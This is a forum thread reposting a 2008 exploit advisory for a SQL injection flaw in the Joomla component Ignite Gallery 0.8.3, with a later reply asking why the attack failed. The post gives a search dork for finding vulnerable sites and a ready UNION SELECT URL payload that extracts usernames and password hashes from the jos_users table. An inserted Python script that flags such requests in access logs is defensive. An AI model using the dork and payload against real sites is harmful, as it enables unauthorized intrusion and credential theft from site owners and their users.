Posted by EVA-00 on 11-10-2008 03:19
#1
#############################################################################
# #
# Joomla Component Ignite Gallery SQL Injection Vulnerability #
# #
#############################################################################
########################################
[~] Vulnerability found by: H!tm@N
[~] Contact: hitman[at]khg-crew[dot]ws
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, urtan, chs, redc00de - [-=Kosova Hackers Group=-]
########################################
[~] ScriptName: "Joomla"
[~] Component: "Ignite Gallery (com_ignitegallery)"
[~] Version: "0.8.3"
[~] Author: "Matt Thomson"
[~] Author E-mail: "matt@ignitejoomlaextensions.com"
[~] Author URL: "www.ignitejoomlaextensions.com"
########################################
[~] DORK: inurl:"com_ignitegallery"
########################################
[~] Exploit: /index.php?option=com_ignitegallery&task=view&gallery=[SQL]&Itemid=18
[~] Example: /index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10+from+jos_users--&Itemid=18
########################################
[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] United States of Albania
########################################
# milw0rm.com [2008-10-10]
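A defender-side check for the request pattern in the advisory above, as an added example that is not part of the original post: it flags access-log entries where the `gallery` parameter sent to com_ignitegallery is not a plain numeric ID. The log lines are constructed, the function name is hypothetical, and the premise that legitimate `gallery` values are always numeric is an assumption not stated in the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not from a real server.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Oct/2008:10:00:01 +0000] "GET /index.php?option=com_ignitegallery&task=view&gallery=3&Itemid=18 HTTP/1.1" 200 5120
192.0.2.44 - - [10/Oct/2008:10:02:17 +0000] "GET /index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,3--&Itemid=18 HTTP/1.1" 200 2210
198.51.100.7 - - [10/Oct/2008:10:05:40 +0000] "GET /index.php?option=com_ignitegallery&task=view&gallery=-1%20UNION%20SELECT%201,2,3--&Itemid=18 HTTP/1.1" 200 2210
192.0.2.10 - - [10/Oct/2008:10:06:02 +0000] "GET /index.php?option=com_content&view=article&id=5:about HTTP/1.1" 200 8841
192.0.2.10 - - [10/Oct/2008:10:07:13 +0000] "GET /index.php?option=com_ignitegallery&task=list&Itemid=18 HTTP/1.1" 200 4410
"""

# Pulls the request target out of the quoted request line of a log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate gallery identifier is digits only.
NUMERIC_ID = re.compile(r"\d+")


def suspicious_gallery_requests(log_text):
    """Return (client_ip, decoded_gallery_value) for every request to
    com_ignitegallery whose gallery parameter is not a plain integer."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        # parse_qs decodes '+' and %XX, so encoded variants are compared
        # in the same form the application would receive them.
        query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        if "com_ignitegallery" not in query.get("option", []):
            continue  # other components are out of scope for this check
        for value in query.get("gallery", []):
            if not NUMERIC_ID.fullmatch(value):
                hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_gallery_requests(SAMPLE_LOG):
        print(f"{ip}\tgallery={value!r}")
```

Matching on the decoded value rather than on keywords means the check also catches payloads that avoid obvious SQL words, at the cost of depending on the numeric-ID assumption.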
Posted by sanca on 22-11-2008 11:13
#6
EVA-00 wrote:
The bug above is very dangerous, because an attacker can see the administrator's username and password in the form of an md5 hash.
Why doesn't it work...??
When I tried it, the gallery just turned blank and black.
There was some kind of hidden text there; it only shows up when we highlight it. But it's not the username and password.
Has it perhaps already been patched?